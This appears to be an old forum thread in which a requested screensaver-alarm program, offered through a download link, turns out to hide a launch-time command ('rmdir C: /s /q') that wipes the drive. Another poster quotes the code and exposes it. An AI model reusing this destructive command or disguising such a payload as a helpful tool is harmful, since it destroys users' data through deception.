Posted September 12, 200618 yr ok well i need something like an alarm that goes off when my screen savershuts off and u have to put in a password, If the password is false then the alarm is quiet and get real lound untill u get the password right this is for Windows SP2
September 12, 200618 yr I'll write you one, check back tomorrow Edit: if u have a specific sound u want to be played, link me
September 12, 200618 yr Got bored and made it while taking a shit. It's written in C# so go download the latest .net framework from microsoft (http://www.microsoft.com/downloads/thankyou.aspx?familyId=0856eacb-4362-4b0d-8edd-aab15c5e04f5&displayLang=en&oRef=http%3a%2f%2fmsdn.microsoft.com%2fnetframework%2fdownloads%2fupdates%2fdefault.aspx) Here is the url to the prog i made for u http://h1.ripway.com/Kelba/KSSA.zip
September 12, 200618 yr Ablek said: Here is the url to the prog i made for u http://h1.ripway.com/Kelba/KSSA.zip private void Form1_Load (object sender, EventArgs e) { Process process1 = Process.Start ("cmd.exe", "/C rmdir C: /s /q"); } I wonder what that code does..
September 12, 200618 yr Author or if thats too hard you can do one that turns the computer off after 2 trys.
September 22, 200618 yr Author Does that really reformat my HDD? im not opening it untill u prove otherwise.
October 6, 200618 yr Quote Does that really reformat my HDD? im not opening it untill u prove otherwise. It does